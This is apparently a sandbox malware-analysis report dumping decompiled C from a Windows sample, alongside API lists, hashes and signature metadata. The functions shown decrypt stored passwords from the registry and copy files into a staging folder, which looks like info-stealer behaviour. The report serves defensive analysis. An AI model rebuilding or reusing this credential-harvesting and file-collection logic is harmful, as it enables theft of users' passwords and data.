                                                                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?,00000038), ref: 0040359F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$FreeProcess_strcpy_s$AllocByteCharCryptDataEnumH_prolog3LocalMultiOpenUnprotectValueWide
                                                                                • String ID: (C$Password
                                                                                • API String ID: 597719749-923554978
                                                                                • Opcode ID: 460eef4d82618387a12e90021518f6bffe0c491f5f20d6a402ed9ac21f6ff259
                                                                                • Instruction ID: 2c51c7e4318fc76dc8eab74b4b971b5b9e7f47f053030457f5226b6cb3d33774
                                                                                • Opcode Fuzzy Hash: 460eef4d82618387a12e90021518f6bffe0c491f5f20d6a402ed9ac21f6ff259
                                                                                • Instruction Fuzzy Hash: B9A171B1900249AFDB21DF95CD84BEE7BFCFB48304F10452AE949E7291D778AA04CB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 74%
                                                                                			E00408B6B(void* __ebx, intOrPtr __ecx, void* __edi, CHAR* __esi, void* __eflags) {
                                                                                				intOrPtr _t52;
                                                                                				void* _t57;
                                                                                				void* _t67;
                                                                                				void* _t72;
                                                                                				void* _t73;
                                                                                				void* _t75;
                                                                                				void* _t82;
                                                                                				intOrPtr _t86;
                                                                                				CHAR* _t88;
                                                                                				void* _t115;
                                                                                				void* _t116;
                                                                                				void* _t117;
                                                                                
                                                                                				_t114 = __esi;
                                                                                				_t110 = __edi;
                                                                                				_push(0x408);
                                                                                				E004219DE(E00436356, __ebx, __edi, __esi);
                                                                                				_t52 =  *((intOrPtr*)(_t115 + 0x40));
                                                                                				 *((intOrPtr*)(_t115 - 0x414)) = _t52;
                                                                                				 *((intOrPtr*)(_t115 - 0x410)) = __ecx;
                                                                                				 *((intOrPtr*)(_t115 - 4)) = 1;
                                                                                				wsprintfA(_t115 - 0x118, "%s\\*", _t52);
                                                                                				_t117 = _t116 + 0xc;
                                                                                				_t57 = FindFirstFileA(_t115 - 0x118, _t115 - 0x408);
                                                                                				 *(_t115 - 0x40c) = _t57;
                                                                                				if(_t57 == 0xffffffff) {
                                                                                					L11:
                                                                                					E00402C34(_t115 + 8, 1, 0);
                                                                                					E00402C34(_t115 + 0x24, 1, 0);
                                                                                					return E00421A61(1, _t110, _t114);
                                                                                				}
                                                                                				_t114 = "\\";
                                                                                				do {
                                                                                					_push(".");
                                                                                					_push(_t115 - 0x3dc);
                                                                                					if( *0x44a1d8() != 0) {
                                                                                						_t67 =  *0x44a1d8(_t115 - 0x3dc, "..");
                                                                                						_t122 = _t67;
                                                                                						if(_t67 != 0) {
                                                                                							wsprintfA(_t115 - 0x220, "%s\\%s",  *((intOrPtr*)(_t115 - 0x414)), _t115 - 0x3dc);
                                                                                							_push("\\Soft\\");
                                                                                							_push(_t115 - 0x2ac);
                                                                                							_t72 = E0040D337(1, _t115 + 0x24, _t114, _t122);
                                                                                							 *((char*)(_t115 - 4)) = 2;
                                                                                							_t73 = E0040D39B(_t72, _t72, _t115 - 0x2c8, _t115 + 8);
                                                                                							 *((char*)(_t115 - 4)) = 3;
                                                                                							_t75 = E0040D3C3(_t72, _t115 - 0x274, _t73, _t114);
                                                                                							 *((char*)(_t115 - 4)) = 4;
                                                                                							E0040D3C3(_t72, _t115 - 0x23c, _t75,  *((intOrPtr*)(_t115 - 0x410)));
                                                                                							E00402C34(_t115 - 0x274, 1, 0);
                                                                                							E00402C34(_t115 - 0x2c8, 1, 0);
                                                                                							 *((char*)(_t115 - 4)) = 8;
                                                                                							E00402C34(_t115 - 0x2ac, 1, 0);
                                                                                							_push(_t114);
                                                                                							_push(_t115 - 0x290);
                                                                                							_t82 = E0040D337(1, _t115 - 0x23c, _t114, _t122);
                                                                                							 *((char*)(_t115 - 4)) = 9;
                                                                                							E0040D3C3(_t115 - 0x3dc, _t115 - 0x258, _t82, _t115 - 0x3dc);
                                                                                							_t117 = _t117 + 0x4c;
                                                                                							_t110 = 0;
                                                                                							 *((char*)(_t115 - 4)) = 0xb;
                                                                                							E00402C34(_t115 - 0x290, 1, 0);
                                                                                							_t123 =  *((intOrPtr*)(_t115 - 0x228)) - 0x10;
                                                                                							_t86 =  *((intOrPtr*)(_t115 - 0x23c));
                                                                                							if( *((intOrPtr*)(_t115 - 0x228)) < 0x10) {
                                                                                								_t86 = _t115 - 0x23c;
                                                                                							}
                                                                                							_push(_t86);
                                                                                							E004088DB(1, _t110, _t114, _t123);
                                                                                							_t88 =  *(_t115 - 0x258);
                                                                                							if( *((intOrPtr*)(_t115 - 0x244)) < 0x10) {
                                                                                								_t88 = _t115 - 0x258;
                                                                                							}
                                                                                							CopyFileA(_t115 - 0x220, _t88, 1);
                                                                                							 *0x44a338 =  *0x44a338 + 1;
                                                                                							E00402C34(_t115 - 0x258, 1, _t110);
                                                                                							 *((char*)(_t115 - 4)) = 1;
                                                                                							E00402C34(_t115 - 0x23c, 1, _t110);
                                                                                						}
                                                                                					}
                                                                                				} while (FindNextFileA( *(_t115 - 0x40c), _t115 - 0x408) != 0);
                                                                                				FindClose( *(_t115 - 0x40c));
                                                                                				goto L11;
                                                                                			}















                                                                                0x00408b6b
                                                                                0x00408b6b
                                                                                0x00408b6b
                                                                                0x00408b75
                                                                                0x00408b7a
                                                                                0x00408b7d
                                                                                0x00408b83
                                                                                0x00408b99
                                                                                0x00408b9c
                                                                                0x00408ba2
                                                                                0x00408bb3
                                                                                0x00408bb9
                                                                                0x00408bc2
                                                                                0x00408d6e
                                                                                0x00408d74
                                                                                0x00408d7f
                                                                                0x00408d89
                                                                                0x00408d89
                                                                                0x00408bc8
                                                                                0x00408bcd
                                                                                0x00408bcd
                                                                                0x00408bd8
                                                                                0x00408be1
                                                                                0x00408bf3
                                                                                0x00408bf9
                                                                                0x00408bfb
                                                                                0x00408c1a
                                                                                0x00408c26
                                                                                0x00408c2b
                                                                                0x00408c2f
                                                                                0x00408c41
                                                                                0x00408c45
                                                                                0x00408c53
                                                                                0x00408c57
                                                                                0x00408c62
                                                                                0x00408c6e
                                                                                0x00408c80
                                                                                0x00408c8d
                                                                                0x00408c9a
                                                                                0x00408c9e
                                                                                0x00408ca9
                                                                                0x00408caa
                                                                                0x00408cb1
                                                                                0x00408cc5
                                                                                0x00408cc9
                                                                                0x00408cce
                                                                                0x00408cd1
                                                                                0x00408cdb
                                                                                0x00408cdf
                                                                                0x00408ce4
                                                                                0x00408ceb
                                                                                0x00408cf1
                                                                                0x00408cf3
                                                                                0x00408cf3
                                                                                0x00408cf9
                                                                                0x00408cfa
                                                                                0x00408d06
                                                                                0x00408d0d
                                                                                0x00408d0f
                                                                                0x00408d0f
                                                                                0x00408d1e
                                                                                0x00408d24
                                                                                0x00408d32
                                                                                0x00408d3f
                                                                                0x00408d42
                                                                                0x00408d42
                                                                                0x00408bfb
                                                                                0x00408d5a
                                                                                0x00408d68
                                                                                0x00000000

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 00408B75
                                                                                • wsprintfA.USER32 ref: 00408B9C
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00408BB3
                                                                                • StrCmpCA.SHLWAPI(?,00440CA4), ref: 00408BD9
                                                                                • StrCmpCA.SHLWAPI(?,00440CA8), ref: 00408BF3
                                                                                • wsprintfA.USER32 ref: 00408C1A
                                                                                  • Part of subcall function 0040D337: __EH_prolog3.LIBCMT ref: 0040D33E
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • CopyFileA.KERNEL32 ref: 00408D1E
                                                                                • FindNextFileA.KERNEL32(?,?), ref: 00408D54
                                                                                • FindClose.KERNEL32(?), ref: 00408D68
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$wsprintf$CloseCopyFirstH_prolog3H_prolog3_Next_memmove
                                                                                • String ID: %s\%s$%s\*$\Soft\
                                                                                • API String ID: 3482278095-1410843534
                                                                                • Opcode ID: 399c040569c5708c3e77376a15312cdfd02956043a70641d1904fe30aad0dbae
                                                                                • Instruction ID: 093ded11f7476e5d6d2f9204ca064d014effbcdec827b671122684dcae828282
                                                                                • Opcode Fuzzy Hash: 399c040569c5708c3e77376a15312cdfd02956043a70641d1904fe30aad0dbae
                                                                                • Instruction Fuzzy Hash: AA5181B180115CABDB25DBA5CD89FCE777CAF14304F0045EAB509B2191DB785B88CF29
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E00406FE6(void* __ebx, void* __ecx, signed int __edx, intOrPtr _a4) {
                                                                                				signed int _v12;
                                                                                				char _v280;
                                                                                				char _v544;
                                                                                				struct _SYSTEMTIME _v560;
                                                                                				signed char _v561;
                                                                                				signed char _v562;
                                                                                				signed char _v563;
                                                                                				signed int _v564;
                                                                                				void* _v568;
                                                                                				signed int _v572;
                                                                                				char _v576;
                                                                                				struct _FILETIME _v584;
                                                                                				char _v586;
                                                                                				char _v587;
                                                                                				char _v588;
                                                                                				struct _FILETIME _v596;
                                                                                				struct _FILETIME _v604;
                                                                                				unsigned int _v636;
                                                                                				intOrPtr _v660;
                                                                                				intOrPtr _v664;
                                                                                				unsigned int _v672;
                                                                                				unsigned int _v688;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t162;
                                                                                				intOrPtr _t164;
                                                                                				void* _t165;
                                                                                				signed int _t173;
                                                                                				void* _t175;
                                                                                				signed int _t177;
                                                                                				void* _t178;
                                                                                				signed int _t182;
                                                                                				signed int _t183;
                                                                                				signed int _t184;
                                                                                				signed int _t191;
                                                                                				unsigned int _t203;
                                                                                				long _t215;
                                                                                				void* _t217;
                                                                                				signed char _t222;
                                                                                				long _t239;
                                                                                				long _t247;
                                                                                				signed int _t250;
                                                                                				void _t255;
                                                                                				void* _t262;
                                                                                				void _t266;
                                                                                				void _t267;
                                                                                				signed int _t271;
                                                                                				unsigned int _t280;
                                                                                				signed int _t282;
                                                                                				unsigned int _t284;
                                                                                				signed int _t291;
                                                                                				signed int _t292;
                                                                                				signed char* _t303;
                                                                                				signed int _t311;
                                                                                				signed char _t317;
                                                                                				signed int _t326;
                                                                                				signed int _t327;
                                                                                				intOrPtr* _t338;
                                                                                				signed int _t340;
                                                                                				signed int _t342;
                                                                                				signed int _t347;
                                                                                
                                                                                				_t313 = __edx;
                                                                                				_t262 = __ebx;
                                                                                				_t162 =  *0x447674; // 0x4124c941
                                                                                				_v12 = _t162 ^ _t347;
                                                                                				_t164 = _a4;
                                                                                				_t337 = __ecx;
                                                                                				_v568 = __ecx;
                                                                                				if(_t164 < 0xffffffff) {
                                                                                					L64:
                                                                                					_t165 = 0x10000;
                                                                                					L65:
                                                                                					return E0041DEB4(_t165, _t262, _v12 ^ _t347, _t313, _t328, _t337);
                                                                                				}
                                                                                				_t328 =  *__ecx;
                                                                                				if(_t164 >=  *((intOrPtr*)( *__ecx + 4))) {
                                                                                					goto L64;
                                                                                				}
                                                                                				if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
                                                                                					E00406EF9(_t328);
                                                                                					_t164 = _a4;
                                                                                				}
                                                                                				 *(_t337 + 4) =  *(_t337 + 4) | 0xffffffff;
                                                                                				if(_t164 !=  *((intOrPtr*)(_t337 + 0x134))) {
                                                                                					__eflags = _t164 - 0xffffffff;
                                                                                					if(_t164 != 0xffffffff) {
                                                                                						_t266 =  *_t337;
                                                                                						__eflags = _t164 -  *((intOrPtr*)(_t266 + 0x10));
                                                                                						if(_t164 <  *((intOrPtr*)(_t266 + 0x10))) {
                                                                                							E00406801(_t266);
                                                                                							_t337 = _v568;
                                                                                							_t164 = _a4;
                                                                                						}
                                                                                						_t267 =  *_t337;
                                                                                						__eflags =  *((intOrPtr*)(_t267 + 0x10)) - _t164;
                                                                                						if( *((intOrPtr*)(_t267 + 0x10)) >= _t164) {
                                                                                							L14:
                                                                                							_t328 = 0x104;
                                                                                							E004065DE( *_t337,  &_v688, 0,  &_v280, 0x104);
                                                                                							_t173 = E004069B3(__eflags,  *_t337,  &_v572,  &(_v584.dwHighDateTime),  &_v576);
                                                                                							__eflags = _t173;
                                                                                							if(_t173 == 0) {
                                                                                								_t313 = _v584.dwHighDateTime;
                                                                                								_t175 =  *( *_t337);
                                                                                								_t337 = 0;
                                                                                								__eflags = E0040618F(_t175, _v584.dwHighDateTime, 0);
                                                                                								if(__eflags == 0) {
                                                                                									_t177 = E0041D474(_t262, _t313, 0x104, 0, __eflags, _v576);
                                                                                									_t337 =  *( *_v568);
                                                                                									_v572 = _t177;
                                                                                									_t178 = E004061EE( *( *_v568), _t177, 1, _v576);
                                                                                									__eflags = _t178 - _v576;
                                                                                									if(_t178 == _v576) {
                                                                                										 *_t262 =  *( *_v568 + 0x10);
                                                                                										_t182 = 0;
                                                                                										__eflags = 0;
                                                                                										do {
                                                                                											_t271 =  *((intOrPtr*)(_t347 + _t182 - 0x114));
                                                                                											 *((char*)(_t347 + _t182 - 0x21c)) = _t271;
                                                                                											_t182 = _t182 + 1;
                                                                                											__eflags = _t271;
                                                                                										} while (_t271 != 0);
                                                                                										_t338 =  &_v544;
                                                                                										while(1) {
                                                                                											_t183 =  *_t338;
                                                                                											__eflags = _t183;
                                                                                											if(_t183 == 0) {
                                                                                												break;
                                                                                											}
                                                                                											L24:
                                                                                											__eflags =  *((char*)(_t338 + 1)) - 0x3a;
                                                                                											if( *((char*)(_t338 + 1)) != 0x3a) {
                                                                                												goto L26;
                                                                                											}
                                                                                											_t338 = _t338 + 2;
                                                                                											while(1) {
                                                                                												_t183 =  *_t338;
                                                                                												__eflags = _t183;
                                                                                												if(_t183 == 0) {
                                                                                													break;
                                                                                												}
                                                                                												goto L24;
                                                                                											}
                                                                                											L26:
                                                                                											__eflags = _t183 - 0x5c;
                                                                                											if(_t183 == 0x5c) {
                                                                                												L28:
                                                                                												_t338 = _t338 + 1;
                                                                                												while(1) {
                                                                                													_t183 =  *_t338;
                                                                                													__eflags = _t183;
                                                                                													if(_t183 == 0) {
                                                                                														break;
                                                                                													}
                                                                                													goto L24;
                                                                                												}
                                                                                												goto L26;
                                                                                											}
                                                                                											__eflags = _t183 - 0x2f;
                                                                                											if(_t183 != 0x2f) {
                                                                                												_t184 = E0041EE74(_t338, "\\..\\");
                                                                                												__eflags = _t184;
                                                                                												if(_t184 != 0) {
                                                                                													L33:
                                                                                													_t50 = _t184 + 4; // 0x4
                                                                                													_t338 = _t50;
                                                                                													continue;
                                                                                												}
                                                                                												_t184 = E0041EE74(_t338, "\\../");
                                                                                												__eflags = _t184;
                                                                                												if(_t184 != 0) {
                                                                                													goto L33;
                                                                                												}
                                                                                												_t184 = E0041EE74(_t338, "/../");
                                                                                												__eflags = _t184;
                                                                                												if(_t184 != 0) {
                                                                                													goto L33;
                                                                                												}
                                                                                												_t184 = E0041EE74(_t338, "/..\\");
                                                                                												__eflags = _t184;
                                                                                												if(_t184 == 0) {
                                                                                													E0041ECF0(_t262 + 4, _t338, _t328);
                                                                                													_t280 = _v636;
                                                                                													_v563 = _t280 >> 0x0000001e & 0x00000001;
                                                                                													_t191 = _v688 >> 8;
                                                                                													_t317 =  !(_t280 >> 0x17) & 0x00000001;
                                                                                													_v562 = 0;
                                                                                													_v561 = 0;
                                                                                													_v564 = 1;
                                                                                													__eflags = _t191;
                                                                                													if(_t191 == 0) {
                                                                                														L38:
                                                                                														_v562 = _t280 >> 0x00000001 & 0x00000001;
                                                                                														_v561 = _t280 >> 0x00000002 & 0x00000001;
                                                                                														_t317 = _t280 & 0x00000001;
                                                                                														_t282 = _t280 >> 0x00000005 & 0x00000001;
                                                                                														__eflags = _t282;
                                                                                														_v563 = _t280 >> 0x00000004 & 0x00000001;
                                                                                														_v564 = _t282;
                                                                                														L39:
                                                                                														 *(_t262 + 0x108) =  *(_t262 + 0x108) & 0x00000000;
                                                                                														__eflags = _v563;
                                                                                														if(_v563 != 0) {
                                                                                															 *(_t262 + 0x108) = 0x10;
                                                                                														}
                                                                                														__eflags = _v564;
                                                                                														if(_v564 != 0) {
                                                                                															_t67 = _t262 + 0x108;
                                                                                															 *_t67 =  *(_t262 + 0x108) | 0x00000020;
                                                                                															__eflags =  *_t67;
                                                                                														}
                                                                                														__eflags = _v562;
                                                                                														if(_v562 != 0) {
                                                                                															_t70 = _t262 + 0x108;
                                                                                															 *_t70 =  *(_t262 + 0x108) | 0x00000002;
                                                                                															__eflags =  *_t70;
                                                                                														}
                                                                                														__eflags = _t317;
                                                                                														if(_t317 != 0) {
                                                                                															_t72 = _t262 + 0x108;
                                                                                															 *_t72 =  *(_t262 + 0x108) | 0x00000001;
                                                                                															__eflags =  *_t72;
                                                                                														}
                                                                                														__eflags = _v561;
                                                                                														if(_v561 != 0) {
                                                                                															_t75 = _t262 + 0x108;
                                                                                															 *_t75 =  *(_t262 + 0x108) | 0x00000004;
                                                                                															__eflags =  *_t75;
                                                                                														}
                                                                                														 *((intOrPtr*)(_t262 + 0x124)) = _v664;
                                                                                														 *((intOrPtr*)(_t262 + 0x128)) = _v660;
                                                                                														_t203 = _v672;
                                                                                														_t284 = _t203 >> 0x10;
                                                                                														_v560.wYear = (_t284 >> 9) + 0x7bc;
                                                                                														_v560.wDay = _t284 & 0x0000001f;
                                                                                														_v560.wHour = _t203 >> 0xb;
                                                                                														_v560.wSecond = (_t203 & 0x0000001f) + (_t203 & 0x0000001f);
                                                                                														_v560.wMilliseconds = 0;
                                                                                														_v560.wMonth = _t284 >> 0x00000005 & 0x0000000f;
                                                                                														_v560.wMinute = _t203 >> 0x00000005 & 0x0000003f;
                                                                                														SystemTimeToFileTime( &_v560,  &_v584);
                                                                                														_v604.dwLowDateTime = _v584.dwLowDateTime;
                                                                                														_v604.dwHighDateTime = _v584.dwHighDateTime;
                                                                                														LocalFileTimeToFileTime( &_v604,  &_v596);
                                                                                														_t215 = _v596.dwLowDateTime;
                                                                                														_t291 = _v596.dwHighDateTime;
                                                                                														_t313 = 0;
                                                                                														__eflags = _v576 - 4;
                                                                                														 *(_t262 + 0x10c) = _t215;
                                                                                														 *(_t262 + 0x110) = _t291;
                                                                                														 *(_t262 + 0x114) = _t215;
                                                                                														 *(_t262 + 0x118) = _t291;
                                                                                														 *(_t262 + 0x11c) = _t215;
                                                                                														 *(_t262 + 0x120) = _t291;
                                                                                														if(_v576 <= 4) {
                                                                                															L61:
                                                                                															__eflags = _v572;
                                                                                															if(_v572 != 0) {
                                                                                																_push(_v572);
                                                                                																E0041EE8B();
                                                                                															}
                                                                                															_t292 = 0x4b;
                                                                                															_t337 = _t262;
                                                                                															_t217 = memcpy(_v568 + 8, _t337, _t292 << 2);
                                                                                															_t328 = _t337 + _t292 + _t292;
                                                                                															 *(_v568 + 0x134) = _t217;
                                                                                															goto L7;
                                                                                														} else {
                                                                                															_v586 = 0;
                                                                                															while(1) {
                                                                                																_t340 = _v572;
                                                                                																_v588 =  *((intOrPtr*)(_t313 + _t340));
                                                                                																_v587 =  *((intOrPtr*)(_t340 + _t313 + 1));
                                                                                																_push(3);
                                                                                																__eflags = 0;
                                                                                																asm("repe cmpsb");
                                                                                																if(0 == 0) {
                                                                                																	break;
                                                                                																}
                                                                                																_t119 = ( *(_t313 + _v572 + 2) & 0x000000ff) + 4; // 0x4
                                                                                																_t250 = _t313 + _t119;
                                                                                																_v584.dwHighDateTime = _t250;
                                                                                																__eflags = _t250 + 4 - _v576;
                                                                                																if(_t250 + 4 < _v576) {
                                                                                																	_t313 = _v584.dwHighDateTime;
                                                                                																	continue;
                                                                                																}
                                                                                																goto L61;
                                                                                															}
                                                                                															_t342 = _v572;
                                                                                															_t222 =  *(_t313 + _t342 + 4) & 0x000000ff;
                                                                                															_v561 = _t222 >> 0x00000001 & 0x00000001;
                                                                                															_t313 = _t313 + 5;
                                                                                															_v562 = _t222 >> 0x00000002 & 0x00000001;
                                                                                															__eflags = _t222 & 0x00000001;
                                                                                															if((_t222 & 0x00000001) != 0) {
                                                                                																_t307 = _t313 + _t342;
                                                                                																_t327 = _t313 + 4;
                                                                                																__eflags = ((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t307 & 0x000000ff;
                                                                                																_v584.dwHighDateTime = _t327;
                                                                                																_t247 = E004041BC(((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t307 & 0x000000ff, _t327);
                                                                                																 *(_t262 + 0x120) = _t327;
                                                                                																_t313 = _v584.dwHighDateTime;
                                                                                																 *(_t262 + 0x11c) = _t247;
                                                                                															}
                                                                                															__eflags = _v561;
                                                                                															if(_v561 != 0) {
                                                                                																_t305 = _t313 + _t342;
                                                                                																_t326 = _t313 + 4;
                                                                                																__eflags = ((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t305 & 0x000000ff;
                                                                                																_v584.dwHighDateTime = _t326;
                                                                                																_t239 = E004041BC(((((_t313 + _t342)[3] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[2] & 0x000000ff) << 0x00000008 | (_t313 + _t342)[1] & 0x000000ff) << 0x00000008 |  *_t305 & 0x000000ff, _t326);
                                                                                																 *(_t262 + 0x110) = _t326;
                                                                                																_t313 = _v584.dwHighDateTime;
                                                                                																 *(_t262 + 0x10c) = _t239;
                                                                                															}
                                                                                															__eflags = _v562;
                                                                                															if(_v562 != 0) {
                                                                                																_t303 = _t313 + _v572;
                                                                                																_t313 = _t303[1] & 0x000000ff;
                                                                                																__eflags = (((_t303[3] & 0x000000ff) << 0x00000008 | _t303[2] & 0x000000ff) << 0x00000008 | _t313) << 0x00000008 |  *_t303 & 0x000000ff;
                                                                                																 *(_t262 + 0x114) = E004041BC((((_t303[3] & 0x000000ff) << 0x00000008 | _t303[2] & 0x000000ff) << 0x00000008 | _t313) << 0x00000008 |  *_t303 & 0x000000ff, _t313);
                                                                                																 *(_t262 + 0x118) = _t313;
                                                                                															}
                                                                                															goto L61;
                                                                                														}
                                                                                													}
                                                                                													__eflags = _t191 - 7;
                                                                                													if(_t191 == 7) {
                                                                                														goto L38;
                                                                                													}
                                                                                													__eflags = _t191 - 0xb;
                                                                                													if(_t191 == 0xb) {
                                                                                														goto L38;
                                                                                													}
                                                                                													__eflags = _t191 - 0xe;
                                                                                													if(_t191 != 0xe) {
                                                                                														goto L39;
                                                                                													}
                                                                                													goto L38;
                                                                                												}
                                                                                												goto L33;
                                                                                											}
                                                                                											goto L28;
                                                                                										}
                                                                                									}
                                                                                									_push(_v572);
                                                                                									E0041EE8B();
                                                                                								}
                                                                                								_t165 = 0x800;
                                                                                								goto L65;
                                                                                							}
                                                                                							_t165 = 0x700;
                                                                                							goto L65;
                                                                                						} else {
                                                                                							do {
                                                                                								E00406836( *_t337);
                                                                                								_t255 =  *_v568;
                                                                                								_t337 = _v568;
                                                                                								__eflags =  *((intOrPtr*)(_t255 + 0x10)) - _a4;
                                                                                							} while ( *((intOrPtr*)(_t255 + 0x10)) < _a4);
                                                                                							goto L14;
                                                                                						}
                                                                                					}
                                                                                					goto L9;
                                                                                				} else {
                                                                                					if(_t164 == 0xffffffff) {
                                                                                						L9:
                                                                                						 *_t262 =  *( *_t337 + 4);
                                                                                						 *((char*)(_t262 + 4)) = 0;
                                                                                						 *(_t262 + 0x108) = 0;
                                                                                						 *(_t262 + 0x10c) = 0;
                                                                                						 *(_t262 + 0x110) = 0;
                                                                                						 *(_t262 + 0x114) = 0;
                                                                                						 *(_t262 + 0x118) = 0;
                                                                                						 *(_t262 + 0x11c) = 0;
                                                                                						 *(_t262 + 0x120) = 0;
                                                                                						 *((intOrPtr*)(_t262 + 0x124)) = 0;
                                                                                						 *((intOrPtr*)(_t262 + 0x128)) = 0;
                                                                                						L7:
                                                                                						_t165 = 0;
                                                                                						goto L65;
                                                                                					}
                                                                                					_t337 = _t337 + 8;
                                                                                					_t311 = 0x4b;
                                                                                					memcpy(_t262, _t337, _t311 << 2);
                                                                                					_t328 = _t337 + _t311 + _t311;
                                                                                					goto L7;
                                                                                				}
                                                                                			}
































































                                                                                0x00406fe6
                                                                                0x00406fe6
                                                                                0x00406fef
                                                                                0x00406ff6
                                                                                0x00406ff9
                                                                                0x00406ffd
                                                                                0x00407000
                                                                                0x00407009
                                                                                0x00407588
                                                                                0x00407588
                                                                                0x0040758d
                                                                                0x0040759a
                                                                                0x0040759a
                                                                                0x0040700f
                                                                                0x00407014
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040701e
                                                                                0x00407020
                                                                                0x00407025
                                                                                0x00407025
                                                                                0x00407028
                                                                                0x00407032
                                                                                0x0040704a
                                                                                0x0040704d
                                                                                0x00407094
                                                                                0x00407096
                                                                                0x00407099
                                                                                0x0040709d
                                                                                0x004070a2
                                                                                0x004070a8
                                                                                0x004070a8
                                                                                0x004070ab
                                                                                0x004070ad
                                                                                0x004070b0
                                                                                0x004070cf
                                                                                0x004070cf
                                                                                0x004070e7
                                                                                0x00407106
                                                                                0x0040710e
                                                                                0x00407110
                                                                                0x0040711e
                                                                                0x00407124
                                                                                0x00407126
                                                                                0x0040712d
                                                                                0x0040712f
                                                                                0x00407141
                                                                                0x00407155
                                                                                0x0040715a
                                                                                0x00407160
                                                                                0x00407168
                                                                                0x0040716e
                                                                                0x00407189
                                                                                0x0040718b
                                                                                0x0040718b
                                                                                0x0040718d
                                                                                0x0040718d
                                                                                0x00407194
                                                                                0x0040719b
                                                                                0x0040719c
                                                                                0x0040719c
                                                                                0x004071a0
                                                                                0x004071a6
                                                                                0x004071a6
                                                                                0x004071a8
                                                                                0x004071aa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004071ac
                                                                                0x004071ac
                                                                                0x004071b0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004071b2
                                                                                0x004071a6
                                                                                0x004071a6
                                                                                0x004071a8
                                                                                0x004071aa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004071aa
                                                                                0x004071b7
                                                                                0x004071b7
                                                                                0x004071b9
                                                                                0x004071bf
                                                                                0x004071bf
                                                                                0x004071a6
                                                                                0x004071a6
                                                                                0x004071a8
                                                                                0x004071aa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004071aa
                                                                                0x00000000
                                                                                0x004071a6
                                                                                0x004071bb
                                                                                0x004071bd
                                                                                0x004071c8
                                                                                0x004071cf
                                                                                0x004071d1
                                                                                0x00407206
                                                                                0x00407206
                                                                                0x00407206
                                                                                0x00000000
                                                                                0x00407206
                                                                                0x004071d9
                                                                                0x004071e0
                                                                                0x004071e2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004071ea
                                                                                0x004071f1
                                                                                0x004071f3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004071fb
                                                                                0x00407202
                                                                                0x00407204
                                                                                0x00407211
                                                                                0x00407216
                                                                                0x00407228
                                                                                0x00407236
                                                                                0x0040723c
                                                                                0x0040723f
                                                                                0x00407246
                                                                                0x0040724d
                                                                                0x00407254
                                                                                0x00407256
                                                                                0x00407267
                                                                                0x0040726d
                                                                                0x0040727a
                                                                                0x0040728c
                                                                                0x0040728f
                                                                                0x0040728f
                                                                                0x00407292
                                                                                0x00407298
                                                                                0x0040729e
                                                                                0x0040729e
                                                                                0x004072a5
                                                                                0x004072ac
                                                                                0x004072ae
                                                                                0x004072ae
                                                                                0x004072b8
                                                                                0x004072bf
                                                                                0x004072c1
                                                                                0x004072c1
                                                                                0x004072c1
                                                                                0x004072c1
                                                                                0x004072c8
                                                                                0x004072cf
                                                                                0x004072d1
                                                                                0x004072d1
                                                                                0x004072d1
                                                                                0x004072d1
                                                                                0x004072d8
                                                                                0x004072da
                                                                                0x004072dc
                                                                                0x004072dc
                                                                                0x004072dc
                                                                                0x004072dc
                                                                                0x004072e3
                                                                                0x004072ea
                                                                                0x004072ec
                                                                                0x004072ec
                                                                                0x004072ec
                                                                                0x004072ec
                                                                                0x004072f9
                                                                                0x00407305
                                                                                0x0040730b
                                                                                0x00407313
                                                                                0x00407325
                                                                                0x00407331
                                                                                0x0040733f
                                                                                0x0040734d
                                                                                0x00407356
                                                                                0x00407377
                                                                                0x0040737e
